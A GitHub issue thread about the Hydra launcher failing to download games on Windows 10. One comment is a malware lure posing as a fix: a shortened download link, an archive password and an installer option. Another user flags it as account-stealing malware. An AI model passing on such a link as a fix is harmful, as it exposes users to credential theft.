### ISSUE TITLE
[BUG] Cant download anything

### ISSUE THREAD

**Issue by MihMih2435** [hydralauncher/hydra#921]
### Describe the bug

Every game dont have any accessibility to download the game
![Desktop Screenshot 2024 08 27 - 21 31 37 94](https://github.com/user-attachments/assets/1fbaf372-c22f-4c6a-a6da-12f45004b967)

### Steps to Reproduce

I just opened the hydra launcher and this happened

### Operating System

Windows 10

### Hydra Version

v2.0.3 "Leviticus"

### Before opening this Issue

- [X] I have searched the issues of this repository and believe that this is not a duplicate.
- [X] I am aware that Hydra team does not offer any support or help regarding the downloaded games.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by MihMih2435** [comment]
No i didnt,thanks alot

**Comment by JackEnx** [comment]
read this issue and see if this is your problem #858

**Comment by MihMih2435** [comment]
> read this issue and see if this is your problem #858

Thanks alot!
